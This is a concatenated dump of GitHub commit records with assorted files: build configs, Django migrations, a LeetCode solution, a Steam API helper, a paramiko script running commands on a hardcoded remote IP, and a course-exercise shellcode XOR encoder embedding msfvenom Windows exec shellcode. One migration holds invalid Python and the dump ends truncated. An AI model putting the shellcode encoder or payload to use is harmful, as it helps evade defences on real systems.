"https://storage.googleapis.com/mirror.tensorflow.org/github.com/llvm/llvm-project/archive/{commit}.tar.gz".format(commit = LLVM_COMMIT),
"https://github.com/llvm/llvm-project/archive/{commit}.tar.gz".format(commit = LLVM_COMMIT),
],
link_files = {
"//third_party/llvm:llvm.autogenerated.BUILD": "llvm/BUILD",
"//third_party/mlir:BUILD": "mlir/BUILD",
"//third_party/mlir:build_defs.bzl": "mlir/build_defs.bzl",
"//third_party/mlir:linalggen.bzl": "mlir/linalggen.bzl",
"//third_party/mlir:tblgen.bzl": "mlir/tblgen.bzl",
"//third_party/mlir:test.BUILD": "mlir/test/BUILD",
},
)
| """Provides the repository macro to import LLVM."""
load("//third_party:repo.bzl", "tf_http_archive")
def repo(name):
"""Imports LLVM."""
LLVM_COMMIT = "eb03fa1d2c05bad5a5f75a89d47b4b31d84bb90b"
LLVM_SHA256 = "53260f7983218c72b07f905694505188695e94e4e68fb9f2959f89073724feac"
tf_http_archive(
name = name,
sha256 = LLVM_SHA256,
strip_prefix = "llvm-project-" + LLVM_COMMIT,
urls = [
"https://storage.googleapis.com/mirror.tensorflow.org/github.com/llvm/llvm-project/archive/{commit}.tar.gz".format(commit = LLVM_COMMIT),
"https://github.com/llvm/llvm-project/archive/{commit}.tar.gz".format(commit = LLVM_COMMIT),
],
link_files = {
"//third_party/llvm:llvm.autogenerated.BUILD": "llvm/BUILD",
"//third_party/mlir:BUILD": "mlir/BUILD",
"//third_party/mlir:build_defs.bzl": "mlir/build_defs.bzl",
"//third_party/mlir:linalggen.bzl": "mlir/linalggen.bzl",
"//third_party/mlir:tblgen.bzl": "mlir/tblgen.bzl",
"//third_party/mlir:test.BUILD": "mlir/test/BUILD",
},
)
| apache-2.0 | Python |
62b2c69482d36a7afcdb732dd70a037d2513ba51 | Add script to execute a simple command in a remote server over SSH | inakidelamadrid/bhp_exercises | bh_sshcmd.py | bh_sshcmd.py | import paramiko # pip install paramiko
import os
def ssh_command(ip, user, command):
# you can run this script as
# SSH_PRIV_KEY=[your private key path] python bh_sshcmd.py
key = paramiko.RSAKey.from_private_key_file(os.getenv('SSH_PRIV_KEY'))
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
print "[==>connecting]"
client.connect(ip, username=user, pkey=key)
ssh_session = client.get_transport().open_session()
if ssh_session.active:
ssh_session.exec_command(command)
print(ssh_session.recv(1024))
return
ssh_command('52.35.195.113', 'ubuntu', 'id')
| mit | Python | |
cb7b286d1aa9fc10669b1b59afe334995a4c1174 | add missed migration | taigaio/taiga-back,taigaio/taiga-back,taigaio/taiga-back | taiga/projects/userstories/migrations/0021_auto_20201202_0850.py | taiga/projects/userstories/migrations/0021_auto_20201202_0850.py | # Generated by Django 2.2.14 on 2020-12-02 08:50
from django.db import migrations, models
import taiga.base.utils.time
class Migration(migrations.Migration):
dependencies = [
('userstories', '0020_userstory_swimlane'),
]
operations = [
migrations.AlterField(
model_name='userstory',
name='backlog_order',
field=models.BigIntegerField(default=taiga.base.utils.time.timestamp_mics, verbose_name='backlog order'),
),
migrations.AlterField(
model_name='userstory',
name='kanban_order',
field=models.BigIntegerField(default=taiga.base.utils.time.timestamp_mics, verbose_name='kanban order'),
),
migrations.AlterField(
model_name='userstory',
name='sprint_order',
field=models.BigIntegerField(default=taiga.base.utils.time.timestamp_mics, verbose_name='sprint order'),
),
]
| agpl-3.0 | Python | |
74d094e1071f4fadffbb5f2351c4e171e528b68e | Update split-array-into-consecutive-subsequences.py | yiwen-luo/LeetCode,kamyu104/LeetCode,tudennis/LeetCode---kamyu104-11-24-2015,yiwen-luo/LeetCode,kamyu104/LeetCode,tudennis/LeetCode---kamyu104-11-24-2015,yiwen-luo/LeetCode,tudennis/LeetCode---kamyu104-11-24-2015,yiwen-luo/LeetCode,kamyu104/LeetCode,tudennis/LeetCode---kamyu104-11-24-2015,kamyu104/LeetCode,yiwen-luo/LeetCode,kamyu104/LeetCode,tudennis/LeetCode---kamyu104-11-24-2015 | Python/split-array-into-consecutive-subsequences.py | Python/split-array-into-consecutive-subsequences.py | # Time: O(n)
# Space: O(1)
# You are given an integer array sorted in ascending order (may contain duplicates),
# you need to split them into several subsequences,
# where each subsequences consist of at least 3 consecutive integers. Return whether you can make such a split.
#
# Example 1:
# Input: [1,2,3,3,4,5]
# Output: True
# Explanation:
# You can split them into two consecutive subsequences :
# 1, 2, 3
# 3, 4, 5
# Example 2:
# Input: [1,2,3,3,4,4,5,5]
# Output: True
# Explanation:
# You can split them into two consecutive subsequences :
# 1, 2, 3, 4, 5
# 3, 4, 5
# Example 3:
# Input: [1,2,3,4,4,5]
# Output: False
# Note:
# The length of the input is in range of [1, 10000]
class Solution(object):
def isPossible(self, nums):
"""
:type nums: List[int]
:rtype: bool
"""
pre, cur = float("-inf"), 0
cnt1, cnt2, cnt3 = 0, 0, 0
i = 0
while i < len(nums):
cnt = 0
cur = nums[i]
while i < len(nums) and cur == nums[i]:
cnt += 1
i += 1
if cur != pre + 1:
if cnt1 != 0 or cnt2 != 0:
return False
cnt1, cnt2, cnt3 = cnt, 0, 0
else:
if cnt < cnt1 + cnt2:
return False
cnt1, cnt2, cnt3 = max(0, cnt - (cnt1 + cnt2 + cnt3)), \
cnt1, \
cnt2 + min(cnt3, cnt - (cnt1 + cnt2))
pre = cur
return cnt1 == 0 and cnt2 == 0
| # Time: O(n)
# Space: O(1)
# You are given an integer array sorted in ascending order (may contain duplicates),
# you need to split them into several subsequences,
# where each subsequences consist of at least 3 consecutive integers. Return whether you can make such a split.
#
# Example 1:
# Input: [1,2,3,3,4,5]
# Output: True
# Explanation:
# You can split them into two consecutive subsequences :
# 1, 2, 3
# 3, 4, 5
# Example 2:
# Input: [1,2,3,3,4,4,5,5]
# Output: True
# Explanation:
# You can split them into two consecutive subsequences :
# 1, 2, 3, 4, 5
# 3, 4, 5
# Example 3:
# Input: [1,2,3,4,4,5]
# Output: False
# Note:
# The length of the input is in range of [1, 10000]
class Solution(object):
def isPossible(self, nums):
"""
:type nums: List[int]
:rtype: bool
"""
pre, cur = float("-inf"), 0
cnt1, cnt2, cnt3 = 0, 0, 0
i = 0
while i < len(nums):
cnt = 0
cur = nums[i]
while i < len(nums) and cur == nums[i]:
cnt += 1
i += 1
if cur != pre + 1:
if cnt1 != 0 or cnt2 != 0:
return False
cnt1, cnt2, cnt3 = cnt, 0, 0
else:
if cnt < cnt1 + cnt2:
return False
cnt1, cnt2, cnt3 = max(0, cnt - (cnt1 + cnt2 + cnt3)), \
cnt1, \
cnt2 + min(cnt3, cnt - (cnt1 + cnt2))
pre = cur
return cnt1 == 0 and cnt2 == 0
| mit | Python |
cea70bf2f04779376b6db1570e9df0c40944782d | Create linux_x86_custom_encoder_real_world.py | rcesecurity/slae,rcesecurity/slae,rcesecurity/slae | assignment-4/linux_x86_custom_encoder_real_world.py | assignment-4/linux_x86_custom_encoder_real_world.py | #!/usr/bin/python
# SLAE - Assignment #4: Custom Shellcode Encoder/Decoder (Linux/x86)
# Author: Julien Ahrens (@MrTuxracer)
# Website: http://www.rcesecurity.com
from random import randint
# powered by Metasploit
# windows/exec CMD=calc.exe
# msfvenom -p windows/exec CMD=calc.exe -f python -e generic/none
# Encoder: Custom
shellcode = "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
shellcode += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
shellcode += "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
shellcode += "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
shellcode += "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
shellcode += "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
shellcode += "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
shellcode += "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
shellcode += "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
shellcode += "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
shellcode += "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00"
shellcode += "\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5"
shellcode += "\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a"
shellcode += "\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53"
shellcode += "\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00"
badchars = ["\x00","\x0a","\x0d","\x3b"]
def xorBytes(byteArray):
# Randomize first byte
rnd=randint(1,255)
xor1=(rnd ^ byteArray[0])
xor2=(xor1 ^ byteArray[1])
xor3=(xor2 ^ byteArray[2])
xorArray=bytearray()
xorArray.append(rnd)
xorArray.append(xor1)
xorArray.append(xor2)
xorArray.append(xor3)
return cleanBadChars(byteArray, xorArray, badchars)
def cleanBadChars(origArray, payload, badchars):
for k in badchars:
# Ooops, BadChar found :( Do XOR stuff again with a new random value
# This could run into an infinite loop in some cases
if payload.find(k) >= 0:
payload=xorBytes(origArray)
return payload
def encodeShellcode (byteArr):
shellcode=bytearray()
shellcode.extend(byteArr)
encoded=bytearray()
tmp=bytearray()
final=""
# Check whether shellcode is aligned
if len(shellcode) % 3 == 1:
shellcode.append(0x90)
shellcode.append(0x90)
elif len(shellcode) % 3 == 2:
shellcode.append(0x90)
# Loop to split shellcode into 3-byte-blocks
for i in range(0,len(shellcode),3):
tmp_block=bytearray()
tmp_block.append(shellcode[i])
tmp_block.append(shellcode[i+1])
tmp_block.append(shellcode[i+2])
# Do the RND-Insertion and chained XORs
tmp=xorBytes(tmp_block)
# Some formatting things for easier use in NASM :)
for y in tmp:
if len(str(hex(y))) == 3:
final+=str(hex(y)[:2]) + "0" + str(hex(y)[2:])+","
else:
final+=hex(y)+","
return final[:-1]
print "Encoded Shellcode:\r"
print encodeShellcode(shellcode)
| mit | Python | |
615cb67e0082b6a2d2ab1c91623e9b2a20ddedec | create milestone migration for Havana release | glove747/liberty-neutron,CiscoSystems/vespa,antonioUnina/neutron,miyakz1192/neutron,openstack/neutron,vbannai/neutron,NeCTAR-RC/neutron,SamYaple/neutron,JianyuWang/neutron,redhat-openstack/neutron,vijayendrabvs/ssl-neutron,vijayendrabvs/hap,ntt-sic/neutron,Metaswitch/calico-neutron,yuewko/neutron,noironetworks/neutron,vijayendrabvs/ssl-neutron,Juniper/contrail-dev-neutron,vijayendrabvs/hap,swdream/neutron,mandeepdhami/neutron,cisco-openstack/neutron,gkotton/neutron,Comcast/neutron,sajuptpm/neutron-ipam,swdream/neutron,jerryz1982/neutron,CiscoSystems/neutron,pnavarro/neutron,leeseulstack/openstack,neoareslinux/neutron,ntt-sic/neutron,dims/neutron,silenci/neutron,citrix-openstack-build/neutron,alexandrucoman/vbox-neutron-agent,takeshineshiro/neutron,waltBB/neutron_read,cisco-openstack/neutron,magic0704/neutron,leeseuljeong/leeseulstack_neutron,asgard-lab/neutron,paninetworks/neutron,cernops/neutron,oeeagle/quantum,suneeth51/neutron,beagles/neutron_hacking,yanheven/neutron,CiscoSystems/vespa,eonpatapon/neutron,kaiweifan/neutron,silenci/neutron,shahbazn/neutron,jacknjzhou/neutron,huntxu/neutron,zhhf/charging,SmartInfrastructures/neutron,Stavitsky/neutron,vveerava/Openstack,SamYaple/neutron,citrix-openstack-build/neutron,NeCTAR-RC/neutron,waltBB/neutron_read,aristanetworks/neutron,CiscoSystems/neutron,huntxu/neutron,CiscoSystems/vespa,zhhf/charging,noironetworks/neutron,paninetworks/neutron,wenhuizhang/neutron,vijayendrabvs/ssl-neutron,yuewko/neutron,infobloxopen/neutron,mattt416/neutron,beagles/neutron_hacking,SmartInfrastructures/neutron,aristanetworks/neutron,blueboxgroup/neutron,bigswitch/neutron,wolverineav/neutron,zhhf/charging,gopal1cloud/neutron,jacknjzhou/neutron,pnavarro/neutron,jumpojoy/neutron,gopal1cloud/neutron,sajuptpm/neutron-ipam,bigswitch/neutron,dims/neutron,Stavitsky/neutron,eayunstack/neutron,rdo-management/neutron,Comcast/neutron,sasukeh/neutron,oeeagle/quantum,yamahata/tacker,sasukeh/neutron,skyddv/neutron,kaiweifan/neutron,CiscoSystems/neutron,adelina-t/neutron,projectcalico/calico-neutron,netscaler/neutron,mmnelemane/neutron,projectcalico/calico-neutron,eonpatapon/neutron,blueboxgroup/neutron,wenhuizhang/neutron,adelina-t/neutron,Juniper/neutron,netscaler/neutron,leeseulstack/openstack,chitr/neutron,openstack/neutron,antonioUnina/neutron,vivekanand1101/neutron,mandeepdhami/neutron,mahak/neutron,Juniper/neutron,sebrandon1/neutron,rickerc/neutron_audit,MaximNevrov/neutron,virtualopensystems/neutron,gkotton/neutron,Comcast/neutron,klmitch/neutron,ntt-sic/neutron,Juniper/contrail-dev-neutron,magic0704/neutron,sajuptpm/neutron-ipam,dhanunjaya/neutron,cloudbase/neutron,barnsnake351/neutron,skyddv/neutron,watonyweng/neutron,virtualopensystems/neutron,Metaswitch/calico-neutron,leeseuljeong/leeseulstack_neutron,mmnelemane/neutron,vbannai/neutron,miyakz1192/neutron,Juniper/neutron,vveerava/Openstack,klmitch/neutron,JioCloud/neutron,chitr/neutron,yamahata/neutron,leeseuljeong/leeseulstack_neutron,javaos74/neutron,infobloxopen/neutron,rickerc/neutron_audit,wolverineav/neutron,cernops/neutron,blueboxgroup/neutron,jumpojoy/neutron,vivekanand1101/neutron,shahbazn/neutron,gkotton/neutron,takeshineshiro/neutron,vveerava/Openstack,cloudbase/neutron,dhanunjaya/neutron,vbannai/neutron,yamahata/neutron,MaximNevrov/neutron,asgard-lab/neutron,kaiweifan/neutron,alexandrucoman/vbox-neutron-agent,citrix-openstack-build/neutron,netscaler/neutron,javaos74/neutron,apporc/neutron,virtualopensystems/neutron,watonyweng/neutron,mahak/neutron,rickerc/neutron_audit,redhat-openstack/neutron,JianyuWang/neutron,yanheven/neutron,mahak/neutron,barnsnake351/neutron,igor-toga/local-snat,cloudbase/neutron-virtualbox,JioCloud/neutron,bgxavier/neutron,apporc/neutron,neoareslinux/neutron,glove747/liberty-neutron,mattt416/neutron,sebrandon1/neutron,leeseulstack/openstack,yamahata/tacker,beagles/neutron_hacking,vijayendrabvs/hap,bgxavier/neutron,Juniper/contrail-dev-neutron,eayunstack/neutron,igor-toga/local-snat,openstack/neutron,jerryz1982/neutron,cloudbase/neutron-virtualbox,yamahata/tacker,suneeth51/neutron,rdo-management/neutron,yamahata/neutron | neutron/db/migration/alembic_migrations/versions/havana_release.py | neutron/db/migration/alembic_migrations/versions/havana_release.py | # vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright 2013 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""havana
Revision ID: havana
Revises: 1341ed32cc1e
Create Date: 2013-10-02 00:00:00.000000
"""
# revision identifiers, used by Alembic.
revision = 'havana'
down_revision = '3a520dd165d0'
# Change to ['*'] if this migration applies to all plugins
migration_for_plugins = ['*']
def upgrade(active_plugins=None, options=None):
"""A no-op migration for marking the Havana release."""
pass
def downgrade(active_plugins=None, options=None):
"""A no-op migration for marking the Havana release."""
pass
| apache-2.0 | Python | |
e5247e1123ecd2e5ea1d98668ceded22d99c1c42 | Create twitter-auth.py | timbennett/twitter-tools | twitter-auth.py | twitter-auth.py | # paste your apps.twitter.com keys in here
access_key = ""
access_secret = ""
consumer_key = ""
consumer_secret = ""
| mit | Python | |
f63747a7e19b82a59d7ff1435725c3f35a4ba61b | Add contex processor to use cart in any template | samitnuk/online_shop,samitnuk/online_shop,samitnuk/online_shop | apps/cart/context_processors.py | apps/cart/context_processors.py | from .cart import Cart
def cart(request):
return {'cart': Cart(request)}
| mit | Python | |
7c6077e107f40a3fcc3e1414f26071ceab0e0cf6 | Create missing migration in taiga.projects.notifications | Rademade/taiga-back,xdevelsistemas/taiga-back-community,dayatz/taiga-back,Rademade/taiga-back,dayatz/taiga-back,Rademade/taiga-back,Rademade/taiga-back,gam-phon/taiga-back,taigaio/taiga-back,taigaio/taiga-back,taigaio/taiga-back,gam-phon/taiga-back,dayatz/taiga-back,xdevelsistemas/taiga-back-community,gam-phon/taiga-back,xdevelsistemas/taiga-back-community,gam-phon/taiga-back,Rademade/taiga-back | taiga/projects/notifications/migrations/0006_auto_20151103_0954.py | taiga/projects/notifications/migrations/0006_auto_20151103_0954.py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('notifications', '0005_auto_20151005_1357'),
]
operations = [
migrations.AlterField(
model_name='notifypolicy',
name='notify_level',
field=models.SmallIntegerField(choices=[(<NotifyLevel.involved: 1>, 'Involved'), (<NotifyLevel.all: 2>, 'All'), (<NotifyLevel.none: 3>, 'None')]),
),
]
| agpl-3.0 | Python | |
f10209add7513cba71441b410bf3a52a1d1c816c | add new site PyDéfis | tehron/tehbot | tehbot/plugins/challenge/py.py | tehbot/plugins/challenge/py.py | # -*- coding: utf-8 -*-
from tehbot.plugins.challenge import *
import urllib
import urllib2
import urlparse
import lxml.html
import re
class Site(BaseSite):
def prefix(self):
return u"[PyDéfis]"
def siteurl(self):
return "https://pydefis.callicode.fr"
def userstats(self, user):
return self.userstats_api(user)
def userstats_api(self, user):
url = "https://pydefis.callicode.fr/wechall/userscore?username=%s&authkey=%s"
authkey = self.settings["pydefis_api_key"]
html = urllib2.urlopen(url % (Plugin.to_utf8(user), authkey), timeout=5).read()
if html == "0":
return None
user, rank, score, scoremax, challs_solved, challs_total, users_total = html.split(":")
return user, str(int(challs_solved)), int(challs_total), str(int(rank)), int(users_total), int(score), int(scoremax), None
| mit | Python | |
90a22bf70efbc6b14c697305919f6fca3aae39a1 | Create __init__.py | shnizzedy/SM_openSMILE,shnizzedy/SM_openSMILE,shnizzedy/SM_openSMILE,shnizzedy/SM_openSMILE,shnizzedy/SM_openSMILE | __init__.py | __init__.py | apache-2.0 | Python | ||
ad053bd49c0a108ed06df5385a6571b405476bd8 | Create web_browser.py | umangahuja1/Python | web_browser.py | web_browser.py | from webbrowser import *
url="https://www.google.co.in"
open(url)
'''
This script lets you open the given link from terminal directly.
It is made meanwhile learning python.
'''
| apache-2.0 | Python | |
3b29a94a7009c0b652e8eca0b175bb97250e1b33 | Add an extract_features(image, measurements) function returning a feature vector | widoptimization-willett/feature-extraction | feature_extraction/extraction.py | feature_extraction/extraction.py | import numpy as np
"""
Given an image as a Numpy array and a set of measurement objects
implementing a compute method returning a feature vector, return a combined
feature vector.
"""
def extract_features(image, measurements):
# TODO(liam): parallelize multiple measurements on an image by using Celery
return np.ravel([m.compute(image) for m in measurements])
| apache-2.0 | Python | |
1ee6e4f99318a065ee6cceaf2ed470bb3513188e | Add py-hstspreload (#19188) | LLNL/spack,LLNL/spack,LLNL/spack,iulian787/spack,LLNL/spack,iulian787/spack,iulian787/spack,LLNL/spack,iulian787/spack,iulian787/spack | var/spack/repos/builtin/packages/py-hstspreload/package.py | var/spack/repos/builtin/packages/py-hstspreload/package.py | # Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class PyHstspreload(PythonPackage):
"""Chromium HSTS Preload list as a Python package and updated daily"""
homepage = "https://github.com/sethmlarson/hstspreload"
url = "https://pypi.io/packages/source/h/hstspreload/hstspreload-2020.9.23.tar.gz"
version('2020.9.23', sha256='35822733ba67cfb4efc6cd7d1230b509f0bd42c90eeb329faf2fe679f801e40f')
depends_on('py-setuptools', type='build')
depends_on('py-wheel', type='build')
| lgpl-2.1 | Python | |
6533ac770ffd97ece23dcaba154a31297be76b04 | add Steam Store helper | mikoim/japanization,mikoim/japanization | reviews/utils.py | reviews/utils.py | import requests
from django.core.cache import cache
class SteamException(Exception):
pass
class SteamStore(object):
l = None
cc = None
def __init__(self, language='en', country='jp'):
self.l = language
self.cc = country
def appdetails(self, app_id: int) -> dict:
url = 'http://store.steampowered.com/api/appdetails'
cache_key = 'appdetails_{:d}'.format(app_id)
app_id_str = str(app_id)
j = cache.get(cache_key)
if not j:
r = requests.get(url=url, params={'l': self.l, 'cc': self.cc, 'appids': app_id})
if r.status_code != 200:
raise SteamException('Steam API returned non-200 status')
j = r.json()
cache.set(cache_key, j, 1209600)
if app_id_str not in j or not j[app_id_str]['success']:
raise SteamException('Steam API returned unexpected error')
return j[app_id_str]['data']
@staticmethod
def is_support_japanese(data: dict) -> bool:
k = 'supported_languages'
return k in data and 'Japanese' in data[k]
@staticmethod
def name(data: dict) -> str:
return data['name']
| mit | Python | |
d11491d30a2fb418dd40bf7e97d4d35cc84d6f3f | Move Chuck database query function to another file | trojjer/pyjokes,gmarkall/pyjokes,Wren6991/pyjokes,bennuttall/pyjokes,borjaayerdi/pyjokes,ElectronicsGeek/pyjokes,pyjokes/pyjokes,martinohanlon/pyjokes,birdsarah/pyjokes | pyjokes/chuck.py | pyjokes/chuck.py | # -*- coding: utf-8 -*-
import json
try:
from urllib2 import urlopen
except:
from urllib.request import urlopen
def get_chuck_nerd_jokes():
url = 'http://api.icndb.com/jokes/random?limitTo=[nerdy]'
response = urlopen(url).readall().decode('utf-8')
data = json.loads(response)
d = data['value']
return d['joke']
if __name__ == '__main__':
print(get_chuck_nerd_jokes())
| bsd-3-clause | Python | |
46db4860911e687bf5d3beef5f0b2f96ea145cd2 | FIX lasso_dense_vs_sparse_data.py example needed update. | yyjiang/scikit-learn,pratapvardhan/scikit-learn,joshloyal/scikit-learn,procoder317/scikit-learn,kjung/scikit-learn,tosolveit/scikit-learn,anntzer/scikit-learn,stylianos-kampakis/scikit-learn,mugizico/scikit-learn,Barmaley-exe/scikit-learn,thientu/scikit-learn,vigilv/scikit-learn,AlexRobson/scikit-learn,russel1237/scikit-learn,JsNoNo/scikit-learn,bnaul/scikit-learn,aflaxman/scikit-learn,vivekmishra1991/scikit-learn,theoryno3/scikit-learn,jorik041/scikit-learn,mikebenfield/scikit-learn,shenzebang/scikit-learn,lin-credible/scikit-learn,AIML/scikit-learn,mhue/scikit-learn,vivekmishra1991/scikit-learn,fzalkow/scikit-learn,rsivapr/scikit-learn,andaag/scikit-learn,anurag313/scikit-learn,rishikksh20/scikit-learn,MatthieuBizien/scikit-learn,roxyboy/scikit-learn,spallavolu/scikit-learn,anirudhjayaraman/scikit-learn,trungnt13/scikit-learn,sinhrks/scikit-learn,walterreade/scikit-learn,RomainBrault/scikit-learn,alexeyum/scikit-learn,alvarofierroclavero/scikit-learn,Garrett-R/scikit-learn,ogrisel/scikit-learn,bhargav/scikit-learn,ngoix/OCRF,vybstat/scikit-learn,cl4rke/scikit-learn,JsNoNo/scikit-learn,glouppe/scikit-learn,nesterione/scikit-learn,mhdella/scikit-learn,f3r/scikit-learn,JeanKossaifi/scikit-learn,davidgbe/scikit-learn,sgenoud/scikit-learn,mayblue9/scikit-learn,hitszxp/scikit-learn,Djabbz/scikit-learn,betatim/scikit-learn,yonglehou/scikit-learn,bhargav/scikit-learn,liberatorqjw/scikit-learn,fzalkow/scikit-learn,luo66/scikit-learn,rahuldhote/scikit-learn,ZenDevelopmentSystems/scikit-learn,mehdidc/scikit-learn,equialgo/scikit-learn,luo66/scikit-learn,tawsifkhan/scikit-learn,rexshihaoren/scikit-learn,Aasmi/scikit-learn,MechCoder/scikit-learn,mrshu/scikit-learn,chrsrds/scikit-learn,btabibian/scikit-learn,HolgerPeters/scikit-learn,untom/scikit-learn,AlexandreAbraham/scikit-learn,vivekmishra1991/scikit-learn,CVML/scikit-learn,IshankGulati/scikit-learn,belltailjp/scikit-learn,marcocaccin/scikit-learn,thilbern/scikit-learn,pompiduskus/scikit-learn,pypot/scikit-learn,hitszxp/scikit-learn,MartinDelzant/scikit-learn,ankurankan/scikit-learn,depet/scikit-learn,ivannz/scikit-learn,liangz0707/scikit-learn,quheng/scikit-learn,sgenoud/scikit-learn,RomainBrault/scikit-learn,zorojean/scikit-learn,nikitasingh981/scikit-learn,appapantula/scikit-learn,iismd17/scikit-learn,xubenben/scikit-learn,dsquareindia/scikit-learn,alvarofierroclavero/scikit-learn,dsullivan7/scikit-learn,mehdidc/scikit-learn,yunfeilu/scikit-learn,madjelan/scikit-learn,meduz/scikit-learn,ldirer/scikit-learn,Lawrence-Liu/scikit-learn,thientu/scikit-learn,nikitasingh981/scikit-learn,Nyker510/scikit-learn,mjudsp/Tsallis,heli522/scikit-learn,pratapvardhan/scikit-learn,kevin-intel/scikit-learn,B3AU/waveTree,herilalaina/scikit-learn,TomDLT/scikit-learn,moutai/scikit-learn,dhruv13J/scikit-learn,UNR-AERIAL/scikit-learn,waterponey/scikit-learn,herilalaina/scikit-learn,siutanwong/scikit-learn,murali-munna/scikit-learn,BiaDarkia/scikit-learn,sinhrks/scikit-learn,DonBeo/scikit-learn,fredhusser/scikit-learn,shikhardb/scikit-learn,fredhusser/scikit-learn,yanlend/scikit-learn,fengzhyuan/scikit-learn,ChanChiChoi/scikit-learn,roxyboy/scikit-learn,B3AU/waveTree,ndingwall/scikit-learn,tmhm/scikit-learn,ogrisel/scikit-learn,dingocuster/scikit-learn,aetilley/scikit-learn,ivannz/scikit-learn,iismd17/scikit-learn,pianomania/scikit-learn,phdowling/scikit-learn,zhenv5/scikit-learn,liangz0707/scikit-learn,poryfly/scikit-learn,rajat1994/scikit-learn,ZenDevelopmentSystems/scikit-learn,sarahgrogan/scikit-learn,loli/sklearn-ensembletrees,jakirkham/scikit-learn,HolgerPeters/scikit-learn,kmike/scikit-learn,jakirkham/scikit-learn,zorroblue/scikit-learn,hsiaoyi0504/scikit-learn,sanketloke/scikit-learn,fbagirov/scikit-learn,abhishekkrthakur/scikit-learn,sonnyhu/scikit-learn,bthirion/scikit-learn,dingocuster/scikit-learn,zaxtax/scikit-learn,nesterione/scikit-learn,466152112/scikit-learn,MartinSavc/scikit-learn,Nyker510/scikit-learn,tawsifkhan/scikit-learn,smartscheduling/scikit-learn-categorical-tree,altairpearl/scikit-learn,rrohan/scikit-learn,devanshdalal/scikit-learn,deepesch/scikit-learn,heli522/scikit-learn,Windy-Ground/scikit-learn,xwolf12/scikit-learn,fredhusser/scikit-learn,YinongLong/scikit-learn,jkarnows/scikit-learn,khkaminska/scikit-learn,jjx02230808/project0223,frank-tancf/scikit-learn,glemaitre/scikit-learn,0asa/scikit-learn,huobaowangxi/scikit-learn,simon-pepin/scikit-learn,themrmax/scikit-learn,lesteve/scikit-learn,ZENGXH/scikit-learn,pianomania/scikit-learn,fyffyt/scikit-learn,ClimbsRocks/scikit-learn,robbymeals/scikit-learn,trungnt13/scikit-learn,harshaneelhg/scikit-learn,JPFrancoia/scikit-learn,walterreade/scikit-learn,cl4rke/scikit-learn,jzt5132/scikit-learn,jorge2703/scikit-learn,raghavrv/scikit-learn,mwv/scikit-learn,saiwing-yeung/scikit-learn,hsiaoyi0504/scikit-learn,jlegendary/scikit-learn,zorroblue/scikit-learn,samzhang111/scikit-learn,kagayakidan/scikit-learn,shangwuhencc/scikit-learn,bhargav/scikit-learn,glouppe/scikit-learn,466152112/scikit-learn,robin-lai/scikit-learn,ltiao/scikit-learn,giorgiop/scikit-learn,eg-zhang/scikit-learn,mhdella/scikit-learn,sarahgrogan/scikit-learn,yyjiang/scikit-learn,RomainBrault/scikit-learn,ningchi/scikit-learn,jzt5132/scikit-learn,quheng/scikit-learn,jseabold/scikit-learn,zuku1985/scikit-learn,ishanic/scikit-learn,huzq/scikit-learn,mjgrav2001/scikit-learn,xavierwu/scikit-learn,Windy-Ground/scikit-learn,zorojean/scikit-learn,deepesch/scikit-learn,PatrickChrist/scikit-learn,macks22/scikit-learn,pypot/scikit-learn,justincassidy/scikit-learn,devanshdalal/scikit-learn,vshtanko/scikit-learn,belltailjp/scikit-learn,adamgreenhall/scikit-learn,mehdidc/scikit-learn,AlexandreAbraham/scikit-learn,wazeerzulfikar/scikit-learn,zihua/scikit-learn,adamgreenhall/scikit-learn,poryfly/scikit-learn,aetilley/scikit-learn,rexshihaoren/scikit-learn,lazywei/scikit-learn,ChanderG/scikit-learn,djgagne/scikit-learn,chrsrds/scikit-learn,shahankhatch/scikit-learn,jmschrei/scikit-learn,0x0all/scikit-learn,MartinDelzant/scikit-learn,f3r/scikit-learn,wlamond/scikit-learn,kagayakidan/scikit-learn,tmhm/scikit-learn,eg-zhang/scikit-learn,spallavolu/scikit-learn,pythonvietnam/scikit-learn,depet/scikit-learn,sanketloke/scikit-learn,fabianp/scikit-learn,Lawrence-Liu/scikit-learn,abimannans/scikit-learn,petosegan/scikit-learn,trankmichael/scikit-learn,qifeigit/scikit-learn,terkkila/scikit-learn,vigilv/scikit-learn,eg-zhang/scikit-learn,heli522/scikit-learn,jlegendary/scikit-learn,voxlol/scikit-learn,h2educ/scikit-learn,vshtanko/scikit-learn,ishanic/scikit-learn,pnedunuri/scikit-learn,mxjl620/scikit-learn,DonBeo/scikit-learn,rrohan/scikit-learn,icdishb/scikit-learn,cwu2011/scikit-learn,ycaihua/sc